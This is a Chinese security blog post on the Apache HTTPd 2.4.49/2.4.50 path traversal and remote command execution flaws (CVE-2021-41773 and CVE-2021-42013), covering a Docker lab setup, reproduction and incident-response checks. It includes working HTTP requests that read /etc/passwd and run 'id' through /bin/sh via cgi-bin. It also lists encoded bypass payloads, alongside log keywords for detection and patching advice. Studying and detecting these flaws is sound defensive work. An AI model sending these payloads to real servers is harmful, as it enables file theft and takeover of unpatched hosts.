Apache Httpd 路径穿越以及RCE漏洞排查

最新推荐文章于 2023-12-21 17:18:16 发布
最新推荐文章于 2023-12-21 17:18:16 发布
阅读量282 收藏
点赞数
分类专栏: 应急响应 渗透 文章标签: apache 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132299616
版权

目录

概述

影响范围

环境搭建

漏洞复现

CVE-2021-41773

任意文件读取

命令执行

CVE-2021-42013

应急排查

修复建议

概述

2021年10月6日Apache HTTPd官方发布安全更新,披露了CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。在其2.4.49版本中,引入了一个路径穿越漏洞。在路径穿越目录允许被访问的的情况下,例如配置了 <Directory />Require all granted</Directory>,攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

影响范围

  • 版本等于 2.4.49和2.4.50
  • 穿越的目录允许被访问,比如配置 Require all granted(默认不允许)

环境搭建

git clone https://github.com/blasty/CVE-2021-41773

cd CVE-2021-41773

docker-compose build &amp;&amp; docker-compose up -d
#查看镜像对应端口
docker ps

 

漏洞复现

CVE-2021-41773

任意文件读取

访问界面抓包,直接打payloda即可(注:icons目录必须存在)

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx:8080
User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT
If-None-Match: "29cd-5ce49cca73d40-gzip"
Cache-Control: max-age=0

命令执行

访问界面抓包,修改请求包

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: xxx.xxx.xxx.xxx:8080
User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT
If-None-Match: "29cd-5ce49cca73d40-gzip"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

CVE-2021-42013

该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行

此漏洞的Payload为:

/%2%65./
/%2%65%2e/
/.%2%65/
/%2e%2%65/  
/%2%65%2%65/
/%%32e%%32e/

 

应急排查

1、配置文件排查httpd.conf

查看apache-httpd版本号,是否为2.4.49和2.4.50,以及查看配置文件是否配置了“Require all granted”,cgi和cgid服务是否开启。

2、web访问日志排查

通过查询web网站访问日志,搜索“%2e”“.%65”“%%32e”等关键字,请求方式包括”GET“和”POST”

修复建议

建议使用Apache HTTPd 2.4.49 与Apache HTTPd 2.4.50 版本的服务器更新Apache HTTPd 版本至最新。

参考链接

https://www.cnblogs.com/L0ading/p/15406894.html

dayouziei
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache httpd-2.4.59
04-15
这个版本,"Apache httpd-2.4.59",是该服务器软件的一个更新迭代,旨在提供性能优化、安全增强以及功能扩展。让我们深入探讨这个版本的一些关键特性、功能和改进。 1. **版本升级与兼容性**: Apache httpd-2.4....
Windows版本apache httpd
09-28
在Windows版本的Apache HTTPD中,它保持了与Unix/Linux系统上的核心功能一致性,同时也针对Windows操作系统进行了优化。 标题“Windows版本apache httpd”指的是Apache HTTP Server在Windows操作系统上的实现。这个...
Apache-RCE、目录遍历漏洞、文件解析
最新发布
weixin_68408599的博客
12-21 1208
Apache HTTP Server 2.4.49、2.4.50 版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。Apache HTTPD 是一款 HTTP 服务器。其 2.4.0~2.4.29 版本存在一个解析漏洞,在解析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1385
发现对 Apache HTTP 服务器 2.4.50 中的 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3095
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
Apache HTTPd路径穿越RCE
自强不息
05-12 188
困难、痛苦、挫折总是接踵而至,这正是世间的常理。要是输了,就只能说明我不过是如此程度的男人。
中间件漏洞 | Apache-路径穿越/任意命令执行
weixin_52116519的博客
11-02 1379
Apache HTTP Server 2.4.49 路径穿越漏洞Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
网络安全深入学习第五课——热门框架漏洞RCEApache Shiro 1.2.4反序列化漏洞
p36273的博客
09-18 781
----- 当程序在进行反序列化时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。
Linux下安装Apache httpd.doc
08-18
Linux下安装Apache httpd.doc
apache httpd2.4.46源码包
01-20
另外,Apache的错误日志(通常位于`/var/log/httpd/error_log`)是排查问题的关键资源。 总之,Apache HTTPD 2.4.46源码包提供了一个深入了解和定制Web服务器的平台,涵盖了从基础的HTTP服务到复杂的URL重写和模块...
安装apache httpd软件步骤
01-09
安装apache httpd软件步骤 一、下载httpd-2.4.43.tar.gz软件包 二、进行解压 tar -zxf httpd-2.4.43.tar.gz -C /usr/src -C是指定安装路径,上述命令为将httpd-2.4.43.tar.gz这个压缩包解压到/usr/src里* (因为这里...
Apache Log4j2 RCE(CVE-2021-44228)
weixin_60329395的博客
11-12 1182
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将**用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行(RCE)
漏洞分析|Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
xuandaoren的博客
10-31 3849
Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。类, 然后重写对应的逻辑,这样在运⾏的时候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。获取到了对应的序列化器之后, 会调⽤它的。⾥⾯获取对应的序列化器。
【vulhub系列】CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
Wiofgb的博客
10-04 1409
【vulhub系列】CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
Apache NiFi API RCE 复现
weixin_51345872的博客
09-01 2607
仅供学习参考使用,任何违法事情与本人无关。
漏洞预警:Apache Log4j RCE漏洞
热门推荐
weixin_43526443的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
Apache Solr RCE 未授权上传漏洞(CVE-2020-13957)
weixin_44047654的博客
02-15 717
Apache Solr RCE 未授权上传漏洞(CVE-2020-13957)
Apache Log4j2 RCE漏洞利用反弹shell合集
good good study
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Apache HTTP Server漏洞(CVE-2021-41773)
weixin_44769042的博客
10-26 5631
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
Apache httpd
05-31
Apache httpd(全称Apache HTTP Server)是一个开源的Web服务器软件,由Apache软件基金会开发和维护。它是目前Internet上最流行的Web服务器软件之一,可运行在多种操作系统上,例如UNIX、Linux、Windows等。 Apache...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值